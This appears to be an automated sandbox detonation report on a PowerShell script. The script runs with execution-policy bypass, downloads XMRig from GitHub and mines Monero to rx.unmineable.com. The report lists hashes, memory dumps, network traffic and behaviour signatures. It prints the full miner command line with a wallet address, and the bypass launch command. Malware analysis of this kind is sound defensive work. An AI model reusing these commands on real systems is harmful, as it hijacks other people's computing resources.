SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4556-11-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/4556-12-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/4556-14-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/4556-15-0x000002A7E9F70000-0x000002A7E9F82000-memory.dmp

memory/4556-16-0x000002A7E9F60000-0x000002A7E9F6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3408-47-0x000002073C3E0000-0x000002073C400000-memory.dmp

memory/4556-48-0x00007FFBF81B3000-0x00007FFBF81B5000-memory.dmp

memory/4556-49-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/3408-50-0x00000207D0340000-0x00000207D0360000-memory.dmp

memory/3408-51-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-52-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-54-0x00000207D09C0000-0x00000207D09E0000-memory.dmp

memory/3408-53-0x00000207D0790000-0x00000207D07B0000-memory.dmp

memory/4556-56-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/3408-55-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-57-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-59-0x00000207D09C0000-0x00000207D09E0000-memory.dmp

memory/3408-58-0x00000207D0790000-0x00000207D07B0000-memory.dmp

memory/3408-60-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-61-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-62-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-63-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-64-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-65-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-66-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-67-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-68-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-69-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-70-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-71-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-72-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-73-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-74-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-75-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-76-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-77-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-78-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-79-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-80-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-81-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-82-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-83-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-84-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-85-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-86-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-87-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-88-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-89-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-90-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-91-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-92-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-93-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-94-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-95-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-96-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-97-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-98-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-99-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-100-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-101-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-102-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-103-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-104-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-105-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-106-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-107-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-108-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-109-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-110-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-111-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-112-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-113-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-114-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-115-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-116-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-117-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-118-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win11-20240426-en

Max time kernel

1790s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/1604-0-0x00007FFC142F3000-0x00007FFC142F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xiadtx1c.t1e.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1604-10-0x0000025C4C880000-0x0000025C4C8A2000-memory.dmp

memory/1604-9-0x00007FFC142F0000-0x00007FFC14DB2000-memory.dmp

memory/1604-11-0x00007FFC142F0000-0x00007FFC14DB2000-memory.dmp

memory/1604-12-0x00007FFC142F0000-0x00007FFC14DB2000-memory.dmp

memory/1604-14-0x0000025C4CC30000-0x0000025C4CC42000-memory.dmp

memory/1604-15-0x0000025C4C8F0000-0x0000025C4C8FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2540-46-0x0000024FC8A80000-0x0000024FC8AA0000-memory.dmp

memory/2540-48-0x0000024FC8AD0000-0x0000024FC8AF0000-memory.dmp

memory/1604-47-0x00007FFC142F0000-0x00007FFC14DB2000-memory.dmp

memory/1604-50-0x00007FFC142F3000-0x00007FFC142F5000-memory.dmp

memory/2540-49-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-51-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/1604-52-0x00007FFC142F0000-0x00007FFC14DB2000-memory.dmp

memory/2540-53-0x0000024FC8AF0000-0x0000024FC8B10000-memory.dmp

memory/2540-54-0x0000024FC8B10000-0x0000024FC8B30000-memory.dmp

memory/2540-55-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-56-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-57-0x0000024FC8AF0000-0x0000024FC8B10000-memory.dmp

memory/2540-58-0x0000024FC8B10000-0x0000024FC8B30000-memory.dmp

memory/2540-59-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-60-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-61-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-62-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-63-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-64-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-65-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-66-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-67-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-68-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-69-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-70-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-71-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-72-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-73-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-74-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-75-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-76-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-77-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-78-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-79-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-80-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-81-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-82-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-83-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-84-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-85-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-86-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-87-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-88-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-89-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-90-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-91-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-92-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-93-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-94-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-95-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-96-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-97-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-98-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-99-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-100-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-101-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-102-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-103-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-104-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-105-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-106-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-107-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-108-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-109-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-110-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-111-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-112-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-113-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-114-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-115-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-116-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

memory/2540-117-0x00007FF6A2020000-0x00007FF6A2C53000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:40

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

memory/4664-0-0x00007FFE5FD83000-0x00007FFE5FD85000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l04t1cqj.ad1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4664-1-0x00000196ACDA0000-0x00000196ACDC2000-memory.dmp

memory/4664-11-0x00007FFE5FD80000-0x00007FFE60841000-memory.dmp

memory/4664-12-0x00007FFE5FD80000-0x00007FFE60841000-memory.dmp

memory/4664-14-0x00007FFE5FD80000-0x00007FFE60841000-memory.dmp

memory/4664-15-0x00000196AD810000-0x00000196AD822000-memory.dmp

memory/4664-16-0x00000196ACDF0000-0x00000196ACDFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1364-47-0x0000027ECEA20000-0x0000027ECEA40000-memory.dmp

memory/4664-48-0x00007FFE5FD83000-0x00007FFE5FD85000-memory.dmp

memory/4664-49-0x00007FFE5FD80000-0x00007FFE60841000-memory.dmp

memory/1364-50-0x0000027ED0410000-0x0000027ED0430000-memory.dmp

memory/1364-51-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-52-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-54-0x0000027ED0450000-0x0000027ED0470000-memory.dmp

memory/1364-53-0x0000027ED0430000-0x0000027ED0450000-memory.dmp

memory/4664-56-0x00007FFE5FD80000-0x00007FFE60841000-memory.dmp

memory/1364-55-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-57-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-60-0x0000027ED0450000-0x0000027ED0470000-memory.dmp

memory/1364-59-0x0000027ED0430000-0x0000027ED0450000-memory.dmp

memory/1364-58-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-61-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-62-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-63-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-64-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-65-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-66-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-67-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-68-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-69-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-70-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-71-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-72-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-73-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-74-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-75-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-76-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-77-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-78-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-79-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-80-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-81-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-82-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-83-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-84-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-85-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-86-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-87-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-88-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-89-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-90-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-91-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-92-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-93-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-94-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-95-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-96-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-97-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-98-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-99-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-100-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-101-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-102-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-103-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-104-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-105-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-106-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-107-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-108-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-109-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-110-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-111-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-112-0x00007FF601560000-0x00007FF602193000-memory.dmp

